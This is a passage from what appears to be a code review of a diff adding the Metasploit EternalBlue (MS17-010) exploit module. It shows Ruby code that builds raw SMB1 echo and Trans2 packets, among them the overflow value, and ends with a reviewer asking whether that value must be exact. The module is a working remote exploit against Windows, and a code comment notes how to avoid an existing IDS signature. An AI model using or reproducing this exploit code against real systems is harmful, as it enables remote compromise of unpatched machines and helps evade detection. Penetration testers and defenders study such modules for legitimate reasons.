modules/exploits/windows/smb/ms17_010_eternalblue.rb

```diff
@@ -0,0 +1,694 @@
+    pkt << "\x00"               # type
+    pkt << "\x00\x00\x31"       # len = 49
+    pkt << "\xffSMB"            # SMB1
+    pkt << "\x2b"               # Echo
+    pkt << "\x00\x00\x00\x00"   # Success
+    pkt << "\x18"               # flags
+    pkt << "\x07\xc0"           # flags2
+    pkt << "\x00\x00"           # PID High
+    pkt << "\x00\x00\x00\x00"   # Signature1
+    pkt << "\x00\x00\x00\x00"   # Signature2
+    pkt << "\x00\x00"           # Reserved
+    pkt << [tree_id].pack("S>") # Tree ID
+    pkt << "\xff\xfe"           # PID
+    pkt << [user_id].pack("S>") # UserID
+    pkt << "\x40\x00"           # MultiplexIDs
+
+    pkt << "\x01"               # Word count
+    pkt << "\x01\x00"           # Echo count
+    pkt << "\x0c\x00"           # Byte count
+
+    # echo data
+    # this is an existing IDS signature, and can be nulled out
+    #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
+    pkt <<  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"
+
+    pkt
+  end
+
+  # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
+  def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
+    timeout = (timeout * 0x10) + 3
+
+    pkt = ""
+    pkt << "\x00"                   # Session message
+    pkt << "\x00\x10\x35"           # length
+    pkt << "\xffSMB"                # SMB1
+    pkt << "\x33"                   # Trans2 request
+    pkt << "\x00\x00\x00\x00"       # NT SUCCESS
+    pkt << "\x18"                   # Flags
+    pkt << "\x07\xc0"               # Flags2
+    pkt << "\x00\x00"               # PID High
+    pkt << "\x00\x00\x00\x00"       # Signature1
+    pkt << "\x00\x00\x00\x00"       # Signature2
+    pkt << "\x00\x00"               # Reserved
+    pkt << [tree_id].pack("S>")       # TreeID
+    pkt << "\xff\xfe"               # PID
+    pkt << [user_id].pack("S>")       # UserID
+    pkt << "\x40\x00"               # MultiplexIDs
+
+    pkt << "\x09"                   # Word Count
+    pkt << "\x00\x00"               # Total Param Count
+    pkt << "\x00\x10"               # Total Data Count
+    pkt << "\x00\x00"               # Max Param Count
+    pkt << "\x00\x00"               # Max Data Count
+    pkt << "\x00"                   # Max Setup Count
+    pkt << "\x00"                   # Reserved
+    pkt << "\x00\x10"               # Flags
+    pkt << "\x35\x00\xd0"           # Timeouts
+    pkt << timeout.chr
+    pkt << "\x00\x00"               # Reserved
+    pkt << "\x00\x10"               # Parameter Count
+
+    #pkt << "\x74\x70"               # Parameter Offset
+    #pkt << "\x47\x46"               # Data Count
+    #pkt << "\x45\x6f"               # Data Offset
+    #pkt << "\x4c"                   # Setup Count
+    #pkt << "\x4f"                   # Reserved
+
+    if type == :eb_trans2_exploit
+      vprint_status("Making :eb_trans2_exploit packet")
+
+      pkt << "\x41" * 2957
+
+      pkt << "\x80\x00\xa8\x00"                     # overflow
```

Comment:
Is this value expected to change or is it required to be exactly this in order for the EB exploit to work?